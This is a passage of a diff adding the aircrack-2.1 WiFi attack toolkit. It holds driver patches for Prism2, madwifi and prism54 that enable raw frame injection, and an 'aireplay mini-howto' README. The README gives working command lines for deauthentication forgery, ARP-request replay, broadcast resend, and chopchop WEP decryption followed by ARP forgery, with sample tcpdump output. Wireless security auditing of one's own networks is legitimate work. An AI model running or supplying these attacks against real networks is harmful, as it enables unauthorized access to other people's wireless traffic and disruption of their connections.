-++ word = 5; // HFA384x_PORTTYPE_PSUEDOIBSS;
-+ result = hfa384x_drvr_setconfig16(hw,
-+ HFA384x_RID_CNFPORTTYPE, word);
-+ if ( result ) {
-+@@ -2869,6 +2870,8 @@
-+ }
-+ if ((msg->keepwepflags.status == P80211ENUM_msgitem_status_data_ok) && (msg->keepwepflags.data != P80211ENUM_truth_true)) {
-+ /* Set the wepflags for no decryption */
-++ /* doesn't work - done from the CLI */
-++ /* Fix? KoreK */
-+ word = HFA384x_WEPFLAGS_DISABLE_TXCRYPT |
-+ HFA384x_WEPFLAGS_DISABLE_RXCRYPT;
-+ result = hfa384x_drvr_setconfig16(hw, HFA384x_RID_CNFWEPFLAGS, word);
-+@@ -2914,7 +2917,8 @@
-+ goto failed;
-+ }
-+
-+- if (wlandev->netdev->type == ARPHRD_ETHER) {
-++ if ((wlandev->netdev->type != ARPHRD_IEEE80211) &&
-++ (wlandev->netdev->type != ARPHRD_IEEE80211_PRISM)) {
-+ WLAN_LOG_INFO("monitor mode enabled\n");
-+ }
-+
-+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2sta.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2sta.c
-+--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2sta.c 2005-01-25 01:38:50.000000000 +0100
-++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2sta.c 2005-03-14 13:58:11.000000000 +0100
-+@@ -649,7 +649,8 @@
-+ DBFENTER;
-+
-+ /* If necessary, set the 802.11 WEP bit */
-+- if ((wlandev->hostwep & (HOSTWEP_PRIVACYINVOKED | HOSTWEP_ENCRYPT)) == HOSTWEP_PRIVACYINVOKED) {
-++ if (((wlandev->hostwep & (HOSTWEP_PRIVACYINVOKED | HOSTWEP_ENCRYPT)) == HOSTWEP_PRIVACYINVOKED)
-++ && (skb->protocol != htons(ETH_P_80211_RAW))) {
-+ p80211_hdr->a3.fc |= host2ieee16(WLAN_SET_FC_ISWEP(1));
-+ }
-+
-diff -urN aircrack-2.1.orig/patch/madwifi-20050309.patch.0.1 aircrack-2.1/patch/madwifi-20050309.patch.0.1
---- aircrack-2.1.orig/patch/madwifi-20050309.patch.0.1 1970-01-01 01:00:00.000000000 +0100
-+++ aircrack-2.1/patch/madwifi-20050309.patch.0.1 2005-04-22 08:51:21.936064512 +0200
-@@ -0,0 +1,123 @@
-+diff -ur madwifi/ath/if_ath.c madwifi-foo/ath/if_ath.c
-+--- madwifi/ath/if_ath.c 2005-03-09 14:48:52.000000000 -0500
-++++ madwifi-foo/ath/if_ath.c 2005-03-09 22:02:12.000000000 -0500
-+@@ -1113,7 +1113,8 @@
-+ /*
-+ * Encapsulate the packet for transmission.
-+ */
-+- skb = ieee80211_encap(ic, skb, &ni);
-++ if (ic->ic_opmode != IEEE80211_M_MONITOR)
-++ skb = ieee80211_encap(ic, skb, &ni);
-+ if (skb == NULL) {
-+ DPRINTF(sc, ATH_DEBUG_XMIT,
-+ "%s: discard, encapsulation failure\n", __func__);
-+@@ -2843,7 +2844,7 @@
-+ hdrlen = ieee80211_anyhdrsize(wh);
-+ pktlen = skb->len;
-+
-+- if (iswep) {
-++ if (iswep && ic->ic_opmode != IEEE80211_M_MONITOR) {
-+ const struct ieee80211_cipher *cip;
-+ struct ieee80211_key *k;
-+
-+@@ -2905,7 +2906,7 @@
-+ * use short preamble based on the current mode and
-+ * negotiated parameters.
-+ */
-+- if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) &&
-++ if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && ni != NULL &&
-+ (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE)) {
-+ shortPreamble = AH_TRUE;
-+ sc->sc_stats.ast_tx_shortpre++;
-+@@ -2920,6 +2921,11 @@
-+ */
-+ switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) {
-+ case IEEE80211_FC0_TYPE_MGT:
-++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
-++ atype = HAL_PKT_TYPE_NORMAL; /* default */
-++ txq = sc->sc_ac2q[skb->priority];
-++ break;
-++ }
-+ subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK;
-+ if (subtype == IEEE80211_FC0_SUBTYPE_BEACON)
-+ atype = HAL_PKT_TYPE_BEACON;
-+@@ -2939,6 +2945,11 @@
-+ txq = sc->sc_ac2q[WME_AC_VO];
-+ break;
-+ case IEEE80211_FC0_TYPE_CTL:
-++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
-++ atype = HAL_PKT_TYPE_NORMAL; /* default */
-++ txq = sc->sc_ac2q[skb->priority];
-++ break;
-++ }
-+ atype = HAL_PKT_TYPE_PSPOLL; /* stop setting of duration */
-+ rix = 0; /* XXX lowest rate */
-+ try0 = ATH_TXMAXTRY;
-+@@ -2951,11 +2962,14 @@
-+ break;
-+ case IEEE80211_FC0_TYPE_DATA:
-+ atype = HAL_PKT_TYPE_NORMAL; /* default */
-++ rix = 0; /* XXX lowest rate */
-++ try0 = ATH_TXMAXTRY;
-+ /*
-+ * Data frames; consult the rate control module.
-+ */
-+- ath_rate_findrate(sc, an, shortPreamble, skb->len,
-+- &rix, &try0, &txrate);
-++ if (ic->ic_opmode != IEEE80211_M_MONITOR)
-++ ath_rate_findrate(sc, an, shortPreamble, skb->len,
-++ &rix, &try0, &txrate);
-+ /*
-+ * Default all non-QoS traffic to the background queue.
-+ */
-+@@ -2966,6 +2980,11 @@
-+ txq = sc->sc_ac2q[WME_AC_BK];
-+ break;
-+ default:
-++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
-++ atype = HAL_PKT_TYPE_NORMAL; /* default */
-++ txq = sc->sc_ac2q[skb->priority];
-++ break;
-++ }
-+ printk("%s: bogus frame type 0x%x (%s)\n", dev->name,
-+ wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__);
-+ /* XXX statistic */
-+@@ -3068,6 +3087,12 @@
-+ ieee80211_dump_pkt(skb->data, skb->len,
-+ sc->sc_hwmap[txrate], -1);
-+
-++ /* Let those crazy kids transmit frames in monitor mode */
-++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
-++ /* Only transmit one frame, disable retrans */
-++ try0 = 1;
-++ }
-++
-+ /*
-+ * Determine if a tx interrupt should be generated for
-+ * this descriptor. We take a tx interrupt to reap
-+@@ -3096,7 +3121,7 @@
-+ , pktlen /* packet length */
-+ , hdrlen /* header length */
-+ , atype /* Atheros packet type */
-+- , MIN(ni->ni_txpower,60)/* txpower */
-++ , 60 /* txpower */
-+ , txrate, try0 /* series 0 rate/tries */
-+ , keyix /* key cache index */
-+ , sc->sc_txantenna /* antenna mode */
-+@@ -3104,6 +3129,7 @@
-+ , ctsrate /* rts/cts rate */
-+ , ctsduration /* rts/cts duration */
-+ );
-++
-+ /*
-+ * Setup the multi-rate retry state only when we're
-+ * going to use it. This assumes ath_hal_setuptxdesc
-+@@ -3111,7 +3137,7 @@
-+ * when the hardware supports multi-rate retry and
-+ * we don't use it.
-+ */
-+- if (try0 != ATH_TXMAXTRY)
-++ if (try0 != ATH_TXMAXTRY && ic->ic_opmode != IEEE80211_M_MONITOR)
-+ ath_rate_setupxtxdesc(sc, an, ds, shortPreamble, rix);
-+
-+ ds->ds_link = 0;
-diff -urN aircrack-2.1.orig/patch/prism54-kernel-2.6.10.patch.0.1 aircrack-2.1/patch/prism54-kernel-2.6.10.patch.0.1
---- aircrack-2.1.orig/patch/prism54-kernel-2.6.10.patch.0.1 1970-01-01 01:00:00.000000000 +0100
-+++ aircrack-2.1/patch/prism54-kernel-2.6.10.patch.0.1 2005-04-22 08:51:21.937064360 +0200
-@@ -0,0 +1,12 @@
-+diff -u prism54/islpci_eth.c prism54-diff/islpci_eth.c
-+--- prism54/islpci_eth.c 2004-12-24 16:33:51.000000000 -0500
-++++ prism54-diff/islpci_eth.c 2005-03-02 16:44:15.000000000 -0500
-+@@ -99,7 +99,7 @@
-+
-+ /* determine the amount of fragments needed to store the frame */
-+
-+- frame_size = skb->len < ETH_ZLEN ? ETH_ZLEN : skb->len;
-++ frame_size = skb->len;
-+ if (init_wds)
-+ frame_size += 6;
-+
-diff -urN aircrack-2.1.orig/pcap-aireplay.h aircrack-2.1/pcap-aireplay.h
---- aircrack-2.1.orig/pcap-aireplay.h 1970-01-01 01:00:00.000000000 +0100
-+++ aircrack-2.1/pcap-aireplay.h 2005-04-22 08:51:21.937064360 +0200
-@@ -0,0 +1,40 @@
-+#ifndef _COMMON_H
-+#define _COMMON_H
-+
-+#include <sys/time.h>
-+
-+#define IVSONLY_MAGIC "\xBF\xCA\x84\xD4"
-+#define TCPDUMP_MAGIC 0xA1B2C3D4
-+#define TCPDUMP_CIGAM 0xD4C3B2A1
-+#define PCAP_VERSION_MAJOR 2
-+#define PCAP_VERSION_MINOR 4
-+#define LINKTYPE_ETHERNET 1
-+#define LINKTYPE_IEEE802_11 105
-+#define LINKTYPE_PRISM_HEADER 119
-+
-+struct pcap_file_header
-+{
-+ unsigned int magic;
-+ unsigned short version_major;
-+ unsigned short version_minor;
-+ int thiszone;
-+ unsigned int sigfigs;
-+ unsigned int snaplen;
-+ unsigned int linktype;
-+};
-+
-+struct pcap_pkthdr
-+{
-+ int tv_sec;
-+ int tv_usec;
-+ unsigned int caplen;
-+ unsigned int len;
-+};
-+
-+#define SWAP32(x) \
-+ x = ( ( ( x >> 24 ) & 0x000000FF ) | \
-+ ( ( x >> 8 ) & 0x0000FF00 ) | \
-+ ( ( x << 8 ) & 0x00FF0000 ) | \
-+ ( ( x << 24 ) & 0xFF000000 ) );
-+
-+#endif /* common.h */
-diff -urN aircrack-2.1.orig/README aircrack-2.1/README
---- aircrack-2.1.orig/README 1970-01-01 01:00:00.000000000 +0100
-+++ aircrack-2.1/README 2005-04-22 08:51:21.938064208 +0200
-@@ -0,0 +1,173 @@
-+
-+
-+
-+
-+ aireplay mini-howto
-+
-+
-+
-+
-+ Example test setup:
-+
-+ * Acess Point (hostap) - 00:02:2D:AA:9C:13 , 10.0.0.1
-+ * Wireless client (madwifi) - 00:09:5B:FC:21:F4 , 10.0.0.2
-+ * Laptop with a Prism2 or Atheros of Prism54 card
-+
-+
-+ 0. Changes since last release
-+ =============================
-+
-+ * built-in chopchop operation mode
-+ * added a bunch of options in aireplay
-+ * added deauthentication frame forgery
-+ * Prism2 (wlan-ng) USB device support
-+ * Atheros (madwifi) and Prism54 device support
-+
-+
-+ 1. Driver recompilation
-+ =======================
-+
-+ 1.1. Installing linux-wlan-ng-0.2.1-pre26
-+ -----------------------------------------
-+
-+First, make sure you have updated your card's station and primary
-+firmware with a recent version; I recommend STA 1.7.4 / PRI 1.1.1.
-+
-+cd /usr/src
-+wget --passive-ftp ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/linux-wlan-ng-0.2.1-pre26.tar.bz2
-+tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2
-+cd linux-wlan-ng-0.2.1-pre26
-+patch -Np1 -i ~/aireplay-2.2/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
-+make config
-+make all
-+find /lib/modules \( -name p80211* -o -name prism2* \) -exec rm -v {} \;
-+make -C src install
-+cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/
-+mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
-+ifconfig wlan0 down
-+wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
-+/etc/init.d/pcmcia restart
-+(reinsert card)
-+
-+
-+ 1.2. Installing madwifi
-+ -----------------------
-+
-+Note: a tarball is also available at http://madwifi.otaku42.de/
-+
-+cd /usr/src
-+cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/madwifi co madwifi
-+cd madwifi
-+patch -Np1 -i ~/aireplay-2.2/patch/madwifi-20050309.patch.0.1
-+make
-+make install
-+modprobe ath_pci
-+
-+
-+ 1.3. Installing prism54
-+ -----------------------
-+
-+Make sure the hotplug package is installed and hotplug firmware
-+loading support is present in your kernel (module firmware_class).
-+
-+cd /usr/src
-+wget http://prism54.org/pub/linux/snapshot/tars/prism54-svn-latest.tar.bz2
-+tar -xvjf prism54-svn-latest.tar.bz2
-+cd prism54-svn-latest
-+make modules
-+make install
-+mkdir -p /usr/lib/hotplug/firmware
-+wget http://prism54.org/~mcgrof/firmware/1.0.4.3.arm
-+mv 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
-+modprobe prism54
-+
-+
-+ 2. Using aireplay
-+ =================
-+
-+ *** aireplay does not capture replies: ***
-+ *** you must also start airodump (not Kismet!) ***
-+
-+ If you use madwifi, you may have to place the card in
-+ pure 802.11b mode first:
-+
-+iwpriv ath0 mode 2
-+
-+ If you use wlan-ng, run ./wlanng.sh start wlan0 <channel>
-+ Otherwise run:
-+
-+iwconfig ath0 mode Monitor channel <channel>
-+ifconfig ath0 up
-+
-+
-+ 2.1. Attack 1: deauthentication
-+ -------------------------------
-+
-+This attack is especially useful to capture an ESSID or a WPA handshake;
-+it will not generate WEP traffic (or very little).
-+
-+./airforge 00:02:2D:AA:9C:13 00:09:5B:FC:21:F4 deauth.pcap
-+./aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.pcap ath0
-+
-+
-+ 2.2. Attack 2: classic arp-request resend
-+ -----------------------------------------
-+
-+./aireplay -f 0 -t 1 -m 68 -n 68 -d FF:FF:FF:FF:FF:FF ath0
-+
-+
-+ 2.3. Attack 3: data broadcast resend
-+ ------------------------------------
-+
-+This attack is quite unreliable and often doesn't work. You need
-+the MAC address of an authenticated station so that the AP will
-+not drop the packets. As most APs work in open authentication mode,
-+if you have another wireless card, you can simply associate it
-+and use its MAC address.
-+
-+./aireplay -h 00:09:5B:FC:21:F4 -c FF:FF:FF:FF:FF:FF -o 08 -p 41 ath0
-+
-+
-+ 2.4. Attack 4: arp-request forgery
-+ ----------------------------------
-+
-+First, we need a prga by decrypting a data packet. For this, add the -k
-+flag which will enable KoreK's chopchop attack:
-+
-+./aireplay -k eth1
-+
-+This attack may not work in deauthenticated mode (in which the source
-+MAC address is forged). If this is the case, you will have the pass the
-+address of an authenticated station:
-+
-+./aireplay -h 00:09:5B:FC:21:F4 -k eth1
-+
-+If no station is authenticated, and you have a spare wireless card
-+(say, an orinoco on eth1) you can use it to associate with the AP
-+as most Access Points run in open authentication mode and do not
-+actually check the WEP key - then use the MAC adresse of eth1 when
-+running the chopchop attack. Having an authenticated station is
-+also useful when there are no connected clients, so that the AP
-+will send broadcast packets to the air (even though when don't
-+know the WEP key yet).
-+
-+iwconfig eth1 mode Managed essid "whathever" key 1111111111
-+ifconfig eth1 up
-+
-+If the attack suceeded, have a look at the decrypted packet:
-+
-+tcpdump -e -n -t -r replay_dec-050320-023844.cap
-+
-+BSSID:00:02:2d:aa:9c:13 SA:00:09:5b:fc:21:f4 DA:00:05:1b:44:8a:ce LLC, dsap
-+SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03, IP 10.0.0.2.32774 > 10.0.0.3.22: S
-+2961438793:2961438793(0) win 5840 <mss 1460,sackOK,...>
-+
-+Now we have enough information to forge an ARP request:
-+
-+./airforge replay_dec-050320-023844.xor 1 00:02:2d:aa:9c:13 \
-+00:09:5b:fc:21:f4 10.0.0.2 10.0.0.3 arp.cap
-+
-+And finally:
-+
-+./aireplay -r arp.cap ath0
-+